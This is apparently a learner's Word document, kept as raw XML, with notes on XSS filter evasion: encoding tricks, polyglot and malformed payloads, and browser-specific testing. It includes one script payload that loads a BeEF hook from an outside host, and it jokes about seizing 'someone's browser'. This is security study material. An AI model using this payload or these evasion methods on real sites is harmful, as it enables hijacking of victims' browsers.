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D510" w14:textId="3718656D" w:rsidR="00BD751F" w:rsidRDefault="00C731DF">
      <w:r>
        <w:t xml:space="preserve">Keep trying new attack vectors if the previous doesn’t work -&gt; look for anything interesting that happens and record it so you can base your subsequent attacks off it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0ACD6C" w14:textId="2C403BE8" w:rsidR="00C731DF" w:rsidRDefault="00C731DF" w:rsidP="00C731DF">
      <w:r>
        <w:t>Record blocked special chars or words, things that get rendered different than usual</w:t>
      </w:r>
      <w:r w:rsidR="00E74725">
        <w:t xml:space="preserve">, encodings that get decoded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E74725">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E74725">
        <w:t>…..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6310A1E3" w14:textId="4ACA184D" w:rsidR="00C731DF" w:rsidRDefault="00C731DF" w:rsidP="00C731DF">
      <w:r>
        <w:t xml:space="preserve">Try different types of encodings such as HTML, URL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46131465" w14:textId="323F5093" w:rsidR="00C731DF" w:rsidRDefault="00C731DF" w:rsidP="00C731DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Also try double encodings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4202EEC5" w14:textId="02998538" w:rsidR="00C731DF" w:rsidRDefault="00C731DF" w:rsidP="00C731DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Look up encodings for the context </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>your</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> working with </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6067AB94" w14:textId="0B2A15AD" w:rsidR="006B3FB2" w:rsidRDefault="006B3FB2" w:rsidP="006B3FB2">
      <w:r>
        <w:t xml:space="preserve">Look for what is being encoded and find payloads that don’t use encoded </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>characters, or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> try encoding double encoding or something but if you notice certain things not being encoded by the web-page like a single quote or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>souble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> quote find payloads that only use them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5672950D" w14:textId="688E4D4F" w:rsidR="00E74725" w:rsidRDefault="006B3FB2" w:rsidP="00E747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7E285" wp14:editId="0A020A58">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-140678</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>192893</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="622475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F208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1.1pt,15.2pt" to="479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388531" w14:textId="3BE689EA" w:rsidR="00E74725" w:rsidRDefault="00E74725" w:rsidP="00E74725">
      <w:r>
        <w:t xml:space="preserve">XSS Filter Evasion Cheat Sheet </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16459B65" w14:textId="1F593A40" w:rsidR="00BB402A" w:rsidRDefault="00BB402A" w:rsidP="00E74725">
      <w:r>
        <w:t>-also has a lot of info on escape sequences, Event Handlers, and a ton of info on each payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BAB9D3" w14:textId="6F97584E" w:rsidR="00A24D86" w:rsidRDefault="00A24D86" w:rsidP="00E74725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&lt;SCRIPT SRC=https://beef/hook.jsSCRIPT&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BC101" w14:textId="2CB1CB3B" w:rsidR="00A24D86" w:rsidRDefault="00A24D86" w:rsidP="00E74725">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">^^ this is the main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload w no filter evasion. Our goal is to prove impact, meaning we need to exploit something. Swap out that link with the link to a public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> hook and collect your bounty or someone’s browser …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE63CC" w14:textId="4BC3499D" w:rsidR="00E74725" w:rsidRDefault="00E74725" w:rsidP="00E74725">
      <w:pPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">Check it out -&gt; bookmarked in </w:t>
      </w:r>
      <w:r w:rsidRPr="00E74725">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">cheat sheets </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>folder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEBEA5F" w14:textId="2DAB4484" w:rsidR="00E74725" w:rsidRDefault="00E74725" w:rsidP="00E74725">
      <w:r>
        <w:t>This is an amazing resource filled with some great payloads for bypassing filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7035CD" w14:textId="6EE0E45D" w:rsidR="009D455A" w:rsidRDefault="009D455A" w:rsidP="009D455A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B20E4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>polygot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” payload is also cool while it isn’t really made for bypassing filters it will be able to execute in multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="006B20E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>contexts</w:t>
      </w:r>
      <w:r w:rsidRPr="006B20E4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>making it a good one to try out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE6C346" w14:textId="5D1BEDD1" w:rsidR="00E74725" w:rsidRDefault="00E74725" w:rsidP="009D455A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Has some cool “</w:t>
      </w:r>
      <w:r w:rsidRPr="006B20E4">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>malformed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” payloads which can be good at </w:t>
      </w:r>
      <w:r w:rsidRPr="006B20E4">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>bypassing filters</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F4AFD" w14:textId="51251113" w:rsidR="009D455A" w:rsidRDefault="009D455A" w:rsidP="009D455A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Essentially these malformed payloads can get passed many different types of filters because they are not formed correctly yet the browser automatically tries to fix the malformed code/ tag making it execute. Very cool sneaky payload style.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160CD6C1" w14:textId="50222AA4" w:rsidR="009D455A" w:rsidRDefault="00BB402A" w:rsidP="009D455A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Again,</w:t>
      </w:r>
      <w:r w:rsidR="009D455A">
        <w:t xml:space="preserve"> try to choose one that fits in your specific </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009D455A">
        <w:t>context</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009D455A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1048E87A" w14:textId="3BCE58E5" w:rsidR="006B20E4" w:rsidRDefault="009D455A" w:rsidP="009D455A">
      <w:r>
        <w:t xml:space="preserve">Remember XSS is very often browser specific especially things like the malformed payloads where a browser is automatically correcting the malformed code. Use the user agent swapper extension to simulate a different browser and try payloads in a couple different browsers. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E412E4" w14:textId="59BF79CD" w:rsidR="006B20E4" w:rsidRDefault="006B20E4" w:rsidP="009D455A">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>So much more on the cheat sheet, that wasn’t covered try out all of them or gather them up and throw them in a .txt document!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A847D1" w14:textId="0B747738" w:rsidR="006B20E4" w:rsidRPr="006B20E4" w:rsidRDefault="006B20E4" w:rsidP="006B20E4"/>
    <w:sectPr w:rsidR="006B20E4" w:rsidRPr="006B20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86FDE" w14:textId="77777777" w:rsidR="00834BCA" w:rsidRDefault="00834BCA" w:rsidP="00C731DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0DC55F1D" w14:textId="77777777" w:rsidR="00834BCA" w:rsidRDefault="00834BCA" w:rsidP="00C73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E9B61" w14:textId="77777777" w:rsidR="00834BCA" w:rsidRDefault="00834BCA" w:rsidP="00C731DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="14EF1341" w14:textId="77777777" w:rsidR="00834BCA" w:rsidRDefault="00834BCA" w:rsidP="00C73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DFF0D" w14:textId="4107A324" w:rsidR="00C731DF" w:rsidRDefault="00C731DF">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Filter Evasion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33006"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4836AF38"/>
    <w:lvl w:ilvl="0" w:tplc="F0BC0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8066B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD42AB1C"/>
    <w:lvl w:ilvl="0" w:tplc="F2F8D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210465">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="132724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D8"/>
    <w:rsid w:val="000F362D"/>
    <w:rsid w:val="006B20E4"/>
    <w:rsid w:val="006B3FB2"/>
    <w:rsid w:val="008225D8"/>
    <w:rsid w:val="00834BCA"/>
    <w:rsid w:val="009D455A"/>
    <w:rsid w:val="00A24D86"/>
    <w:rsid w:val="00A51661"/>
    <w:rsid w:val="00B57181"/>
    <w:rsid w:val="00BB402A"/>
    <w:rsid w:val="00BD751F"/>
    <w:rsid w:val="00C731DF"/>
    <w:rsid w:val="00E7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6C32"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B986DF26-AA47-4BCA-A765-CE1EF78F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1DF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C73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1DF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C731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4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thatanon556@proton.me</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>thatanon556@proton.me</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-24T20:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-30T15:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>